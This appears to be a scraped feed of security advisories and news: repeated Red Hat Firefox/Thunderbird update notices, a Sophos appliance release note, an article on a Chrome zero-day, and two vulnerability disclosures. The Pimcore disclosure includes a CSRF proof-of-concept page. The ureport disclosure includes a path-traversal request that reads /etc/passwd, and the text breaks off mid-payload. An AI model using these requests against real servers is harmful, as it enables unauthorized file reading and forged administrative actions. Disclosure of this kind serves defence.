Red Hat Security Advisory 2023-7577-01 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7577.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2023:7577-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7577  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.5.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7577-01

Red Hat Security Advisory 2023-7574-01 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7574.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2023:7574-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7574  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.5.0.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7574-01

Red Hat Security Advisory 2023-7573-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7573.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2023:7573-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7573Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-6204====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.5.0 ESR.Security Fix(es):* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6204References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250896https://bugzilla.redhat.com/show_bug.cgi?id=2250897https://bugzilla.redhat.com/show_bug.cgi?id=2250898https://bugzilla.redhat.com/show_bug.cgi?id=2250899https://bugzilla.redhat.com/show_bug.cgi?id=2250900https://bugzilla.redhat.com/show_bug.cgi?id=2250901https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7573-01

Red Hat Security Advisory 2023-7570-01 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7570.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2023:7570-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7570  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.5.0.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7570-01

Red Hat Security Advisory 2023-7569-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7569.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2023:7569-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7569Issue date:         2023-11-29Revision:           01CVE Names:          CVE-2023-6204====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.5.0 ESR.Security Fix(es):* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6204References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250896https://bugzilla.redhat.com/show_bug.cgi?id=2250897https://bugzilla.redhat.com/show_bug.cgi?id=2250898https://bugzilla.redhat.com/show_bug.cgi?id=2250899https://bugzilla.redhat.com/show_bug.cgi?id=2250900https://bugzilla.redhat.com/show_bug.cgi?id=2250901https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7569-01


A reflected XSS vulnerability allows an open redirect when the victim clicks a malicious link to an error page on 

Sophos Email Appliance 

older than version 4.5.3.4.



Hi everyone,

Sophos Email Appliance version 4.5.3.4 was released on February 2, 2023.

**Limited release**

Version 4.5.3.4 was released to an initial group of customers on February 2, 2023. This release will be made available to all customers over the next few weeks. If you would like to get early access to new features, please contact Sophos Support.

**Release Information**

This release resolves several issues. The appliance will restart after this update.

You should also familiarize yourself with the known issues, since improper configuration of certain options may cause unexpected behavior.

Before you begin installing and configuring the Email Appliance, you should review the configuration directions.

Internet Explorer 7 and later, and Mozilla Firefox version 4.x and later, are the only supported browsers for this product release. However, the Email Appliance has been optimized for current-generation browsers. If you are using an older browser such as Internet Explorer 6 and experience performance issues, consider upgrading to a newer version of Internet Explorer, or to a recent version of Firefox.

**Issues resolved in the Sophos Email Appliance 4.5.3.4 release:**

*   Fixed potential vulnerability to CVE-2021-36806 (SEA-1779).
*   Fixed a potential vulnerability to cipher block chaining (CBC) ciphers with TLS (SEA-1656). Disabled TLS 1.1 for port 25.
*   Removed expired certificates (SEA-1846).
*   Add Amazon root certificate authority (CA) (SEA-1683).

Reference: https://esa.sophos.com/rn/sea/concepts/ReleaseNotes\_4.5.3.4.html

CVE-2021-36806: Sophos Email Appliance version 4.5.3.4 released

Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5.

**Package**

composer pimcore/customer-data-framework (Composer)

**Affected versions**

< 4.0.5

**Impact**

After Navigating to the Customers section of Pimcore application.

Upon clicking on New Customer the following HTTP GET request will be submitted:

GET /admin/customermanagementframework/customers/new HTTP/1.1
Host: demo.pimcore.fun
Cookie: PHPSESSID\=7a4c4ceddbbb3809dab7852fa60713c6; \_pc\_vis=ce525cb79e817973; \_pc\_ses=1695307137653
User\-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: \*/\*
Accept\-Language: en-US,en;q=0.5
Accept\-Encoding: gzip, deflate
X\-Requested\-With: XMLHttpRequest
Sec\-Fetch\-Dest: empty
Sec\-Fetch\-Mode: cors
Sec\-Fetch\-Site: same-origin
Te: trailers
Connection: close

As you can see, there isn't any token or header to prevent CSRF attacks from occuring, therefore an attacker could abuse this vulnerability to create new customers !

**Proof of Concept**

// PoC.js
<!DOCTYPE html\>
<html\>
     <head\>
                <title\>CSRF PoC</title\>
     </head\>
     <body\>
              <img src\="https://demo.pimcore.fun/admin/customermanagementframework/customers/new"\>
     </body\>
</html\>

A successful HTTP response will be received:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 26
    X-Header: <value>
    
    {"success":true,"id":1191}
    

Impact: Creating new customer on behalf of the admin which affects admin's integrity !

**Patches**

Apply https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch manually.

**Workarounds**

Update to version 4.0.5 or apply this patch manually https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch

CVE-2023-49076: CSRF Leading to create a new customer

The vulnerability is among a rapidly growing number of zero-day bugs that major browser vendors have reported recently.

Source: PREMIO STOCK via Shutterstock

For the fourth time since August, Google has disclosed a bug in its Chrome browser technology that attackers were actively exploiting in the wild before the company had a fix for it.

**Integer Overflow Bug**

The latest zero-day, which Google is tracking as CVE-2023-6345, stems from an integer overflow issue in Skia, an open source 2D graphic library in Chrome. The bug is one of seven Chrome vulnerabilities for which Google issued a security update this week.

The company's advisory contained sparse details on CVE-2023-6345 beyond mentioning the fact that an exploit for it is publicly available. A brief description on NIST's National Vulnerability Database (NVD) site described the flaw as affecting versions of Chrome prior to 119.0.6045.199 and allowing a remote attacker who has "compromised the renderer process to potentially perform a sandbox escape via a malicious file." The NVD identified the bug as a high-severity issue.

Google credited researchers at its Threat Analysis Group for finding and reporting CVE-2023-6345 on Nov. 24.

The vulnerability is the seventh zero-day that Google has rushed to patch amid active exploit activity this year and is the latest manifestation of growing attacker interest in Chrome and other browsers.

**A Flood of Browser Zero-Days**

Since the beginning of this year, Apple, Google, Microsoft, and Firefox have all disclosed multiple critical vulnerabilities in their respective browsers, including a handful of zero-days. In some instances, a bug in some widely used component affected multiple browsers at once, as was the case with CVE-2023-4863, a zero-day heap overflow in WebP, a code library common to Chrome, Apple Safari, and Mozilla Firefox. In other instances, as with CVE-2023-5217, a zero-day bug in Chrome impacted multiple browsers based on Chromium technology, such as Microsoft Edge, Opera, Brave, and Vivaldi.

There were also multiple zero-days that Apple disclosed separately this year in its WebKit browser engine for Safari, including CVE-2023-28205 and three others in May: CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Both Microsoft and Mozilla have also separately reported other critical bugs in their respective browsers.

It is unclear which threat actor might be currently exploiting CVE-2023-6345, the bug that Google disclosed this week, or why. But in recent months, Google and Apple have warned about vendors of commercial surveillance products exploiting zero-day bugs in their respective browser technologies to drop spyware on Android, iOS, and other mobile devices. Google discovered CVE-2023-4863 after researchers at Apple and Toronto University Citizen Lab informed the company about a commercial vendor using the flaw to drop Predator spyware on Android and iOS devices.

**Ubiquitous Use**

Much of the growing attacker interest in browsers has to do with their ubiquitous use, says Lionel Litty, chief security architect at Menlo Security. The exploding use of Web applications has resulted in users spending most of their time on browsers for everything from accessing applications and webpages to additional content such as PDFs and other documents. Adding to this is the drive by Google to integrate even more features into its browser and make it a replacement for fat client technologies, Litty says. This includes enabling access to USB devices, Bluetooth, and even the GPU through the WebGPU interface.

"Despite all the care taken by Google engineers, we continue to see a steady stream of security issues that are exploitable, including many zero-days that are actually exploited," he says.

The fact that multiple browsers are based on Chromium is another reason for attackers targeting the technology, Litty notes. "Developing an exploit against Chrome usually means that it will work against all browsers, save Safari and Firefox, allowing bad actors to target more victims without any additional work."

Saeed Abbasi, manager of vulnerability and threat research at Qualys, points to similar reasons for Chrome's growing popularity among threat actors. "Additionally, the high commercial value of exploiting a widely used platform like Chrome attracts sophisticated attackers, including those backed by state sponsors," he says.

More generally, browser vulnerabilities present significant risks for organizations, Abbasi says. Attackers can use browser bugs to sneak malware and spyware into an organization. Additionally, attackers might exploit these weaknesses to steal login credentials and other data for potential future attacks.

"To mitigate risks from browser vulnerabilities, organizations should prioritize regular updates and patch management to keep browsers up to date," Abbasi notes. "Implementing network segmentation can restrict browser access to sensitive areas, reducing breach impacts."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Google Patches Another Chrome Zero-Day as Browser Attacks Mount

Red Hat Security Advisory 2023-7547-01 - An update for firefox is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7547.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2023:7547-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7547  
Issue date:         2023-11-28  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.5.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Red Hat Security Advisory 2023-7547-01

An arbitrary file read vulnerability in ureport v2.2.9 allows a remote attacker to arbitrarily read files on the server by inserting a crafted path.

When inserting image files into the report, there are no restrictions on the format, path, etc. of the image, which allows malicious data to be submitted, causing arbitrary file reading vulnerabilities, and obtaining file contents and sensitive data on the server. The vulnerable code at file：ureport2-core-2.2.9.jar method：com.bstek.ureport.provider.image.DefaultImageProvider： 

It was found that the program did not verify the obtained image path and directly spliced the obtained path into the FileInputStream method, causing an arbitrary file reading vulnerability.

Reproduce the local build environment: Use idea to build a Springboot demo project and introduce ureport2：

Exploiting the Vulnerability

Visit /ureport/designer/ Click the image button and set the path to /../../../../../../../etc/passwd 

Click the preview button 

Then jump to /ureport/preview?\_u=p, you can see a base64 encoded picture 

Decrypt its base64 encoded content and obtain the contents of the /etc/passwd file. 

The http message：

Content parameter content: 

The base64 image content can be seen in the return package of /ureport/preview?\_u=p 

Poc content:

    POST /ureport/designer/savePreviewData HTTP/1.1
    Host: 192.168.100.171:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 5796
    Origin: http://192.168.100.171:8080
    Connection: close
    Referer: http://192.168.100.171:8080/ureport/designer/
    Cookie: JSESSIONID=6041627D8F7E4701AA566790B40078A2
    
    content=%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253Cureport%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A1%2522%2520row%253D%25221%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B1%2522%2520row%253D%25221%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C1%2522%2520row%253D%25221%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D1%2522%2520row%253D%25221%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A2%2522%2520row%253D%25222%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B2%2522%2520row%253D%25222%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C2%2522%2520row%253D%25222%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%25229%2522%2520forecolor%253D%25220%252C0%252C0%2522%2520font-family%253D%2522%25E5%25AE%258B%25E4%25BD%2593%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Cimage-value%2520source%253D%2522text%2522%253E%253Ctext%253E%253C!%255BCDATA%255B%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%255D%255D%253E%253C%252Ftext%253E%253C%252Fimage-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D2%2522%2520row%253D%25222%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A3%2522%2520row%253D%25223%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B3%2522%2520row%253D%25223%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C3%2522%2520row%253D%25223%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D3%2522%2520row%253D%25223%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BC